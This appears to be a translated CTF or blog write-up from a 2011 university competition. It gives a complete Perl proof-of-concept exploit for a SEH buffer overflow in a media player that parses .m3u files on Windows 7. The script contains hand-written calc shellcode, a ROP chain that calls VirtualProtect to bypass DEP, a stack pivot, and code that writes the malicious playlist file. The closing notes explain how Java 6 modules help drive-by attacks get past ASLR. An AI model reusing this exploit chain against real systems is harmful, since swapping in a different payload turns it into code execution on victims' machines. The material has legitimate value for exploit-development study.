Up to this point things went fairly smoothly. Our task seemed to be done, apart from VirtualProtect() being affected by ASLR (the challenge did not require an ASLR bypass). The most annoying part, though, is the shellcode: a few characters of our shellcode always get converted. To find the bad characters, use !mona's compare feature. In the end it was still annoying; for a competition problem my main goal was to practise SEH + DEP bypass, and I felt I had reached that goal, so I hand-wrote a hard-coded shellcode that runs calc.
my $payload = "\x33\xc0".  # xor eax,eax
"\x50".                   # push eax
"\x68\x63\x61\x6c\x63".   # push "calc"
"\x8b\xdc".               # mov ebx,esp
"\x40".                   # inc eax
"\x50".                   # push eax
"\x53".                   # push ebx
"\xb8\xae\xed\xb9\x77".   # mov eax,WinExec
"\xff\xd0";               # call eax

The PoC is below. If you are a beginner as well and want to run this PoC successfully, both the address of VirtualProtect() and the address of WinExec need to be adjusted.

#!/usr/bin/perl
# 2011 Xidian University Network Attack and Defense Competition, vulnerability discovery challenge: SEH exploit for Windows 7 DEP bypass, poc
# by c4rp3nt3r@0x50sec.org
#
# shellcode: WinExec calc.exe
my $payload = "\x33\xc0".  # xor eax,eax
"\x50".                   # push eax               (string terminator)
"\x68\x63\x61\x6c\x63".   # push "calc"
"\x8b\xdc".               # mov ebx,esp            (ebx -> "calc\0")
"\x40".                   # inc eax                (eax = 1, uCmdShow)
"\x50".                   # push eax
"\x53".                   # push ebx               (lpCmdLine)
"\xb8\xae\xed\xb9\x77".   # mov eax,WinExec        (hard-coded address, adjust for your system)
"\xff\xd0";               # call eax
# junk: /opt/metasploit/apps/pro/msf3/tools/pattern_create.rb 5149
my $rop_gadgets = pack('V',0x6aee6245); # POP EBP # RETN [avcodec-52.dll]
$rop_gadgets .= pack('V',0x6aee6245); # POP EBP # RETN [avcodec-52.dll]
$rop_gadgets .= pack('V',0x6adc122d); # POP EAX # RETN [avcodec-52.dll]
$rop_gadgets .= pack('V',0xfffffdff); # Value to negate, will become 0x00000201
$rop_gadgets .= pack('V',0x6b0ce791); # NEG EAX # RETN [avcodec-52.dll]
$rop_gadgets .= pack('V',0x6adb16a5); # PUSH EAX # POP EBX # POP ESI # POP EDI # RETN [avcodec-52.dll]
$rop_gadgets .= pack('V',0x77b52c15); # ptr to &VirtualProtect() kernel32 // hard-coded
$rop_gadgets .= pack('V',0x41414141); # Filler (compensate)
$rop_gadgets .= pack('V',0x6b02836d); # POP EAX # RETN [avcodec-52.dll]
$rop_gadgets .= pack('V',0xffffffc0); # Value to negate, will become 0x00000040
$rop_gadgets .= pack('V',0x6b0ce791); # NEG EAX # RETN [avcodec-52.dll]
$rop_gadgets .= pack('V',0x6ae63239); # XCHG EAX,EDX # RETN [avcodec-52.dll]
$rop_gadgets .= pack('V',0x6af63467); # POP ECX # RETN [avcodec-52.dll]
$rop_gadgets .= pack('V',0x6b19add4); # &Writable location [avcodec-52.dll]
$rop_gadgets .= pack('V',0x6b026a8c); # POP EDI # RETN [avcodec-52.dll]
$rop_gadgets .= pack('V',0x6b05908b); # RETN (ROP NOP) [avcodec-52.dll]
$rop_gadgets .= pack('V',0x6b028274); # POP EAX # RETN [avcodec-52.dll]
$rop_gadgets .= pack('V',0x90909090); # nop
$rop_gadgets .= pack('V',0x6b0665a2); # PUSHAD # RETN [avcodec-52.dll]
$rop_gadgets .= pack('V',0x6afae368); # & jmp esp [avcodec-52.dll]
my $junk = "\x90" x 5149;
my $length = 5149 - 4712 - length($rop_gadgets) - length($payload);
print $length;
my $junk1 = substr($junk,0,4712);                 # padding up to the pivoted esp
my $junk2 = substr($junk,0,$length);              # padding up to the SEH record
my $nseh = "CCCC";
my $seh = pack('V',0x6af51dc2);    # ADD ESP,xxxx: adjust the stack for the stack pivot
open($FH,">exp2.m3u");
print $FH $junk1.$rop_gadgets.$payload.$junk2.$nseh.$seh."\r\n";
#print $FH $junk.$nseh.$seh."\r\n";
close($FH);

 


After the ROP chain runs we land on the jmp esp instruction, and at that point esp points right at our shellcode.


Finally the lovely calc.exe appears.
Summary: after debugging the DEP bypass on Windows 7, my feeling is that DEP alone is easily defeated, while ASLR+DEP is still fairly hard. For Windows 7 drive-by exploits, having Java 6 installed amounts to ASLR being disabled; many msf drive-by modules hit Windows 7 by using Java 6 related modules that do not have ASLR enabled, so XP+IE8 and Windows 7+IE8 are almost the same, you just need a little care when heap spraying. Not perfect, but still rewarding: what I used to think was terrifying turned out not to be. Exploring on my own, progress is slow; I have to keep working harder!


Original article: http://bluereader.org/article/30418820